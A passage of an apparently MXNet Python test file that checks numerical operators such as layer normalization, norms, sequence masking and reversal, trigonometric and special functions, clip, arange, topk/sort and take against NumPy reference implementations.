exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@pytest.mark.skip(reason="Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
@with_seed()
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
# Test monitor on symbol using clip
def simple_callback(name, arr):
pass
exe = test.simple_bind(ctx=mx.current_context(), data=shape)
exe.set_monitor_callback(simple_callback, monitor_all=True)
exe.forward(is_train=True)
exe.backward(out_grads=mx.nd.ones(shape))
mx.nd.waitall()
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
@with_seed()
@pytest.mark.parametrize('mode,out_of_range', [
('clip', True),
('wrap', True),
('raise', False)
])
@pytest.mark.parametrize('data_ndim', range(1, 5))
@pytest.mark.parametrize('idx_ndim', range(1, 4))
def test_take(mode, out_of_range, data_ndim, idx_ndim):
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
